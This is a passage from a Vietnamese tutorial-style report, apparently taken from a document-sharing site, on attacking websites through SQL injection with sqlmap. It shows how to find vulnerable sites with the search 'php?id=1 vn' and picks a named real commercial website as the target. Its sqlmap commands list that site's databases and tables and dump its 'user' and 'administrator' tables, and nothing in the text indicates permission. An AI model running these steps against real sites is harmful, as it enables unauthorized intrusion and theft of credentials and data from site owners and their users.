Tải bản đầy đủ - 0 (trang)
Thay đổi giá trị điều kiện truy vấn

Thay đổi giá trị điều kiện truy vấn

Tải bản đầy đủ - 0trang

Hình 3.1 Cấu trúc một cơ sở dữ liệu đơn giản

-Cơ sở dữ liệu ó cấu trúc hình cây với các thành phần:





Database



: Ví dụ "iot15h", "mysql" chứa các bảng dữ liệu(tables).







Table



: Ví dụ "dht11" , "func", "columns_priv" chứa hàng và cột dữ liệu.







Columns



: Ví dụ "TEMP"," HUM" các cột dữ liệu.



- CSDL có nhiệm vụ lưu trữ và trích xuất dữ liệu phục vụ cho việc truy vấn lên server.

- Tải Github https://github.com/sqlmapproject/sqlmap phục vụ cho việc tấn công.



14



3.2.2 Các bước tấn công và kết quả

B1. Sau khi tải github về vài giải nén ta có thư mục:



Hình 3.2 Giải nén github sqlmap-master

B2. Tìm kiếm một số trang web có nguy cơ bị lỗi với từ khóa : php?id=1 vn



Hình 3.3 Tìm kiếm mục tiêu tấn cơng

B3. Lựa chọn một mục tiêu:

VD: " http://www.nhuaphucthinh.com.vn/product.php?id=20 "

Mục tiêu:



15



Hình 3.4 Trang web là mục tiêu tấn công

B4. Mở cmd lên trong thư mục sqlmap-master/ và thực hiện các lệnh:

python sqlmap.py –u " http://www.nhuaphucthinh.com.vn/product.php?id=20 "

"-u" theo sau là đường dẫn Lệnh này để kiểm tra url trên có dính lỗi sqli khơng

B5. Sau khi phát hiện trang web dính lỗi ta thực hiện truy vấn tên database với câu lệnh:

python sqlmap.py –u " http://www.nhuaphucthinh.com.vn/product.php?id=20 " --dbs

Kết quả trả về:



16



Hình 3.5 Kết quả trả về tên các cơ sở dữ liệu

Ta nhận được về hai database: " information_schema " và " nhuaphucth_inh "

B6. Sau khi có được tên của các database ta chọn ra một database để thực hiện truy vấn:

trong ví dụ này ta chọn database:" nhuaphucth_inh " thực hiện truy vấn các bảng trong

database bằng câu lệnh:

python sqlmap.py -u " http://www.nhuaphucthinh.com.vn/product.php?id=20 " --tables -D

nhuaphucth_inh

Kết quả trả về:



Hình 3.6 Tên các bảng có trong cơ sở dữ liệu

Trên đây là tên các table chứa dữ liệu trong database:" user ", " doi tac ", " product ", ...

B7. Để xem thông tin trong các bảng ta thực hiện lệnh:

python sqlmap.py -u " http://www.nhuaphucthinh.com.vn/product.php?id=20 " --dump –D

nhuaphucth_inh -T "tên bảng"

17



Kết quả trả về với tên bảng = "user":



Hình 3.7 Kết quả truy vấn bảng "user"



Hình 3.8 Kết quả truy vấn bảng "administrator "

18



Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Thay đổi giá trị điều kiện truy vấn

Tải bản đầy đủ ngay(0 tr)

×